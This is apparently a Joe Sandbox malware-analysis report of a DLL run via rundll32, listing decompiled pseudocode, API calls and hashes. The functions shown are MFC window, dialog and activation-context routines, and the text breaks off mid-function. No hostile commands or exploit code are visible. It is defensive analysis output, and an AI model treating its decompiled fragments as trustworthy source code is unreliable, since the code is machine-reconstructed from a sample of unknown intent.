                                                                                                            0x100036b4
                                                                                                            0x100036b7
                                                                                                            0x100036de
                                                                                                            0x100036e4
                                                                                                            0x100036e4
                                                                                                            0x00000000
                                                                                                            0x100035f1
                                                                                                            0x100035ff
                                                                                                            0x10003611
                                                                                                            0x1000368b
                                                                                                            0x100036ab
                                                                                                            0x100036b2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003613
                                                                                                            0x10003613
                                                                                                            0x10003623
                                                                                                            0x10003635
                                                                                                            0x1000363a
                                                                                                            0x10003660
                                                                                                            0x10003665
                                                                                                            0x10003665
                                                                                                            0x10003667
                                                                                                            0x10003685
                                                                                                            0x00000000
                                                                                                            0x10003613
                                                                                                            0x100035eb
                                                                                                            0x100036f9

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100035A3
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100035CF
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 100035DF
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003603
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003623
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000364D
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003679
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000369B
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 100036AB
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100036CA
                                                                                                            • GetProcessHeap.KERNEL32(00000000,000022B9,?,?,?,?,?,?,?,?,?,?,10003044,10003057,10003090,1000309F), ref: 100036E8
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10003044,10003057,10003090,1000309F,00000000), ref: 100036EF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat$??3@Heap$FreeProcess
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 447117116-3161301136
                                                                                                            • Opcode ID: c986ef1d440be94ff09f6e1d70f323da872e541a9ac047334e8279f144c68349
                                                                                                            • Instruction ID: f2d026fc60e697fd50327b110b185c24fe47079f9fec1f7b52e43e207d21a45c
                                                                                                            • Opcode Fuzzy Hash: c986ef1d440be94ff09f6e1d70f323da872e541a9ac047334e8279f144c68349
                                                                                                            • Instruction Fuzzy Hash: 7B415B71104705BFE215EB60CD85E67BBECEB4A385F028819F742DB5A1D732E8548F64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000A2C4 Relevance: 19.7, APIs: 13, Instructions: 176windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E1000A2C4(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1000EEC4(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10008551(_t121, E100084E6(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10005CAE();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10008551(_t121, E100084E6(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1000F1A1(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                                                            0x1000a2c4
                                                                                                            0x1000a2c4
                                                                                                            0x1000a2cb
                                                                                                            0x1000a2ce
                                                                                                            0x1000a2d6
                                                                                                            0x1000a2d9
                                                                                                            0x1000a2de
                                                                                                            0x1000a2ec
                                                                                                            0x1000a2fe
                                                                                                            0x1000a2ee
                                                                                                            0x1000a2f1
                                                                                                            0x1000a2f1
                                                                                                            0x1000a304
                                                                                                            0x1000a308
                                                                                                            0x1000a314
                                                                                                            0x1000a31c
                                                                                                            0x1000a31e
                                                                                                            0x1000a31e
                                                                                                            0x1000a31c
                                                                                                            0x1000a2e0
                                                                                                            0x1000a2e0
                                                                                                            0x1000a2e0
                                                                                                            0x1000a2e0
                                                                                                            0x1000a320
                                                                                                            0x1000a32e
                                                                                                            0x1000a337
                                                                                                            0x1000a3d7
                                                                                                            0x1000a3de
                                                                                                            0x1000a3e5
                                                                                                            0x1000a3ef
                                                                                                            0x1000a33d
                                                                                                            0x1000a33f
                                                                                                            0x1000a344
                                                                                                            0x1000a34f
                                                                                                            0x1000a358
                                                                                                            0x1000a358
                                                                                                            0x1000a34f
                                                                                                            0x1000a35c
                                                                                                            0x1000a363
                                                                                                            0x1000a3a4
                                                                                                            0x1000a3b3
                                                                                                            0x1000a3c0
                                                                                                            0x1000a365
                                                                                                            0x1000a365
                                                                                                            0x1000a36c
                                                                                                            0x1000a36e
                                                                                                            0x1000a36e
                                                                                                            0x1000a37e
                                                                                                            0x1000a391
                                                                                                            0x1000a39b
                                                                                                            0x1000a39b
                                                                                                            0x1000a363
                                                                                                            0x1000a3fe
                                                                                                            0x1000a403
                                                                                                            0x1000a408
                                                                                                            0x1000a40c
                                                                                                            0x1000a40f
                                                                                                            0x1000a416
                                                                                                            0x1000a41e
                                                                                                            0x1000a426
                                                                                                            0x1000a42e
                                                                                                            0x1000a435
                                                                                                            0x1000a43a
                                                                                                            0x1000a446
                                                                                                            0x1000a44e
                                                                                                            0x1000a44e
                                                                                                            0x1000a43c
                                                                                                            0x1000a43c
                                                                                                            0x1000a43c
                                                                                                            0x1000a454
                                                                                                            0x1000a463
                                                                                                            0x1000a46b
                                                                                                            0x1000a46b
                                                                                                            0x1000a456
                                                                                                            0x1000a456
                                                                                                            0x1000a456
                                                                                                            0x1000a483

                                                                                                            APIs
                                                                                                              • Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF
                                                                                                            • GetParent.USER32(?), ref: 1000A2F1
                                                                                                            • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 1000A314
                                                                                                            • GetWindowRect.USER32 ref: 1000A32E
                                                                                                            • GetWindowLongA.USER32 ref: 1000A344
                                                                                                            • CopyRect.USER32 ref: 1000A391
                                                                                                            • CopyRect.USER32 ref: 1000A39B
                                                                                                            • GetWindowRect.USER32 ref: 1000A3A4
                                                                                                            • CopyRect.USER32 ref: 1000A3C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 808654186-0
                                                                                                            • Opcode ID: 9ff1ffca443c0671e985d08d4d0a79713c159cacf4ec812370c5e182881e21c9
                                                                                                            • Instruction ID: 63e85339992314f50ad76cd4fa936f515b0dc0fc70569d21828395b99dd1d8a3
                                                                                                            • Opcode Fuzzy Hash: 9ff1ffca443c0671e985d08d4d0a79713c159cacf4ec812370c5e182881e21c9
                                                                                                            • Instruction Fuzzy Hash: 2C513F76D00619AFEB01CBA8CC85EEEBBB9EB49390F154214F905B7195D730EE858B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100056D9 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100056D9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10046ad4; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E10004E6E(0, _t12, _t15, _t16, _t20);
					}
					 *0x10046ac4 = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10046ac8 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10046acc = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10046ac4; // 0x0
					 *0x10046ad0 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10046ac8; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10046acc; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10046ac8; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10046acc; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10046ad4 = 1;
				}
				return _t18;
			}














                                                                                                            0x100056d9
                                                                                                            0x100056d9
                                                                                                            0x100056df
                                                                                                            0x100056e3
                                                                                                            0x100056e6
                                                                                                            0x100056e9
                                                                                                            0x100056f0
                                                                                                            0x10005701
                                                                                                            0x10005703
                                                                                                            0x10005705
                                                                                                            0x10005707
                                                                                                            0x10005707
                                                                                                            0x10005707
                                                                                                            0x10005721
                                                                                                            0x1000572e
                                                                                                            0x1000573b
                                                                                                            0x10005740
                                                                                                            0x10005742
                                                                                                            0x10005748
                                                                                                            0x1000574d
                                                                                                            0x1000574e
                                                                                                            0x10005766
                                                                                                            0x1000576c
                                                                                                            0x00000000
                                                                                                            0x1000576e
                                                                                                            0x1000576e
                                                                                                            0x10005774
                                                                                                            0x00000000
                                                                                                            0x10005776
                                                                                                            0x10005776
                                                                                                            0x10005778
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10005778
                                                                                                            0x10005774
                                                                                                            0x10005750
                                                                                                            0x10005750
                                                                                                            0x10005756
                                                                                                            0x00000000
                                                                                                            0x10005758
                                                                                                            0x10005758
                                                                                                            0x1000575e
                                                                                                            0x00000000
                                                                                                            0x10005760
                                                                                                            0x10005760
                                                                                                            0x10005762
                                                                                                            0x00000000
                                                                                                            0x10005764
                                                                                                            0x10005762
                                                                                                            0x1000575e
                                                                                                            0x10005756
                                                                                                            0x1000577a
                                                                                                            0x1000577a
                                                                                                            0x10005786

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,10006175,000000FF), ref: 100056FB
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10005719
                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10005726
                                                                                                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10005733
                                                                                                            • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10005740
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                            • API String ID: 667068680-3617302793
                                                                                                            • Opcode ID: 399c8412fe992e4a50a3ddfc252fd3a3d78dcfedf62abfe816ac053d2fec79fd
                                                                                                            • Instruction ID: 1d76d1e4db1a962794084fd329e7408aae32bd70e769f2b2ddda66e1b27d4fc6
                                                                                                            • Opcode Fuzzy Hash: 399c8412fe992e4a50a3ddfc252fd3a3d78dcfedf62abfe816ac053d2fec79fd
                                                                                                            • Instruction Fuzzy Hash: B51188B5809666DEF701EF65DEC040B7AE4E70A682705902FE108E2564E73218589F0B
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100080BA Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E100080BA(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E1001FBF7(E10033165, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1000EC09(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E1000EC09(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E10007BF2(_t84, _t100, __eflags);
					E1000A998(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E10005CAE();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E1000EFB3(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E1000EFCE(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E1000C3CA(_t96, __eflags, _t100);
					_t58 = E1000A8F0(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E10007ECA(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E1000EEC4(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E1000A486(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E1000F1A1(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E1000EFCE(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E10007C2C(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E1001FC9C(_t63);
				}
			}
















                                                                                                            0x100080ba
                                                                                                            0x100080ba
                                                                                                            0x100080ba
                                                                                                            0x100080c1
                                                                                                            0x100080c6
                                                                                                            0x100080c8
                                                                                                            0x100080ce
                                                                                                            0x100080d4
                                                                                                            0x100080d7
                                                                                                            0x100080dc
                                                                                                            0x100080df
                                                                                                            0x100080e1
                                                                                                            0x100080e4
                                                                                                            0x100080eb
                                                                                                            0x100080fc
                                                                                                            0x10008102
                                                                                                            0x10008102
                                                                                                            0x10008108
                                                                                                            0x1000810d
                                                                                                            0x10008113
                                                                                                            0x10008113
                                                                                                            0x10008119
                                                                                                            0x10008123
                                                                                                            0x1000812a
                                                                                                            0x1000812d
                                                                                                            0x10008132
                                                                                                            0x10008135
                                                                                                            0x10008138
                                                                                                            0x1000813b
                                                                                                            0x1000813e
                                                                                                            0x10008146
                                                                                                            0x10008149
                                                                                                            0x10008154
                                                                                                            0x10008156
                                                                                                            0x1000815d
                                                                                                            0x10008163
                                                                                                            0x1000816f
                                                                                                            0x10008171
                                                                                                            0x10008173
                                                                                                            0x10008176
                                                                                                            0x1000817a
                                                                                                            0x10008182
                                                                                                            0x10008184
                                                                                                            0x10008186
                                                                                                            0x1000818d
                                                                                                            0x1000818f
                                                                                                            0x10008193
                                                                                                            0x10008195
                                                                                                            0x1000819a
                                                                                                            0x1000819a
                                                                                                            0x1000818f
                                                                                                            0x10008184
                                                                                                            0x10008176
                                                                                                            0x10008156
                                                                                                            0x10008149
                                                                                                            0x100081a1
                                                                                                            0x100081a6
                                                                                                            0x100081ae
                                                                                                            0x100081b3
                                                                                                            0x100081b4
                                                                                                            0x100081b5
                                                                                                            0x100081ba
                                                                                                            0x100081bf
                                                                                                            0x100081c1
                                                                                                            0x100081c3
                                                                                                            0x100081c5
                                                                                                            0x100081c9
                                                                                                            0x100081cd
                                                                                                            0x100081d0
                                                                                                            0x100081d5
                                                                                                            0x100081d9
                                                                                                            0x100081dd
                                                                                                            0x100081dd
                                                                                                            0x100081e1
                                                                                                            0x100081e6
                                                                                                            0x100081e6
                                                                                                            0x100081e6
                                                                                                            0x100081e8
                                                                                                            0x100081eb
                                                                                                            0x100081f9
                                                                                                            0x100081f9
                                                                                                            0x100081eb
                                                                                                            0x100081fe
                                                                                                            0x10008221
                                                                                                            0x10008224
                                                                                                            0x1000822a
                                                                                                            0x1000822a
                                                                                                            0x1000822f
                                                                                                            0x10008232
                                                                                                            0x10008239
                                                                                                            0x10008239
                                                                                                            0x1000823f
                                                                                                            0x10008242
                                                                                                            0x1000824a
                                                                                                            0x1000824d
                                                                                                            0x10008252
                                                                                                            0x10008252
                                                                                                            0x1000824d
                                                                                                            0x1000825c
                                                                                                            0x10008261
                                                                                                            0x10008266
                                                                                                            0x10008269
                                                                                                            0x1000826e
                                                                                                            0x1000826e
                                                                                                            0x10008274
                                                                                                            0x00000000
                                                                                                            0x1000811b
                                                                                                            0x1000811b
                                                                                                            0x10008277
                                                                                                            0x1000827c
                                                                                                            0x1000827c

                                                                                                            APIs
                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 100080C1
                                                                                                            • FindResourceA.KERNEL32(?,?,00000005), ref: 100080F4
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 100080FC
                                                                                                            • LockResource.KERNEL32(?,00000024,100011BE,00000000,00000120), ref: 1000810D
                                                                                                            • GetDesktopWindow.USER32 ref: 10008140
                                                                                                            • IsWindowEnabled.USER32(?), ref: 1000814E
                                                                                                            • EnableWindow.USER32(?,00000000), ref: 1000815D
                                                                                                              • Part of subcall function 1000EFB3: IsWindowEnabled.USER32(?), ref: 1000EFBC
                                                                                                              • Part of subcall function 1000EFCE: EnableWindow.USER32(?,000000FF), ref: 1000EFDB
                                                                                                            • EnableWindow.USER32(?,00000001), ref: 10008239
                                                                                                            • GetActiveWindow.USER32 ref: 10008244
                                                                                                            • SetActiveWindow.USER32(?,?,00000024,100011BE,00000000,00000120), ref: 10008252
                                                                                                            • FreeResource.KERNEL32(?,?,00000024,100011BE,00000000,00000120), ref: 1000826E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1509511306-0
                                                                                                            • Opcode ID: af41f4a29e55a80224d8f74d86220bf91cb66e9945eb366eb3219191cba3f32d
                                                                                                            • Instruction ID: 62cfd41f18e3cc2e1163053c16dc1e50d79b68c3982d3d37ae726430dd99fe76
                                                                                                            • Opcode Fuzzy Hash: af41f4a29e55a80224d8f74d86220bf91cb66e9945eb366eb3219191cba3f32d
                                                                                                            • Instruction Fuzzy Hash: BD517D34A007459FFB11DFA4CC85AAEBAB5FF48781F204029E582B61A6CB755A42CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000C033 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1000C033(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E1001FBF7(E10033663, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E1000A8F0(1, _t60, _t71,  *(_t71 + 0x14));
					E1000BF47(_t60, E1000A8F0(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
